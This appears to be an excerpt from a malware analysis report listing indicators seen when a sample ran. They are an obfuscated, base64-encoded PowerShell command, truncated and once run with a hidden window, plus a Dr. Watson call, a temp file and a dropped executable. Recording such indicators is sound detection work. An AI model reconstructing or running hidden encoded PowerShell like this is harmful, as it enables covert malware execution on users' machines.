Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMgBsADEAeAAgACAAPQBbAFQAeQBwAGUAXQAoACIAewAwAH0AewA1AH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAgAC0AZgAgACcAcwAnACwAJwBUAGUATQAnACwAJwAuAEkAJwAsACcATwAuAEQAaQBSAEUAYw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1174625.cvr
- %HOMEPATH%\lv3u2gl\v5npotg\iw0cldar_.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMgBsADEAeAAgACAAPQBbAFQAeQBwAGUAXQAoACIAewAwAH0AewA1AH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAgAC0AZgAgACcAcwAnACwAJwBUAGUATQAnACwAJwAuAEkAJwAsACcATwAuAEQAaQBSAEUAYw...' (with hidden window)